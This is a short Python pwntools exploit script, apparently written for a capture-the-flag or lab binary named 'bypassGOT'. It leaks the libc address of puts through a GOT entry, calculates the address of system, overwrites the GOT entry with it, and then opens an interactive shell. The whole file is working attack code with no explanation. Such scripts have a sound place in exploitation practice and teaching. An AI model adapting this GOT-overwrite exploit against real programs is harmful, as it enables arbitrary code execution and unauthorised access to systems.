#!/usr/bin/python

from pwn import *


puts_got = 0x804c018
offset___libc_start_main_ret = 0x1f08e
offset_puts = 0x00071380
offset_system = 0x000456e0
offset_dup2 = 0x000f5f50
offset_read = 0x000f51b0
offset_write = 0x000f5270
offset_str_bin_sh = 0x195108
def main():
    p = process("./bypassGOT")


    # ==== stage 1: leak puts@libc ====

    # leak puts@libc
    stage_1 = b"/bin/sh" + b"\x00" * (24 - len("/bin/sh")) + p32(puts_got)


    data = p.recv()
    p.send(stage_1)
    data = p.recv()
    #log.info("Captured information is: %s", data)
    left = data.find(b"(")
    right = data.find(b")")
    #log.info("left: %d, right: %d", left, right)
    data = data[left+1: right]
    log.info("leaked information is: %s", data)
    puts_libc = u32(data[:4])
    log.info("puts@libc: %x", puts_libc)

    # ==== stage 2: replace puts@libc with system@libc ====
    libc_base = puts_libc - offset_puts
    system_libc = libc_base + offset_system
    log.info("system@libc: %x", system_libc)
    p.send(p32(system_libc))



    p.interactive()

if __name__ == "__main__":
    main()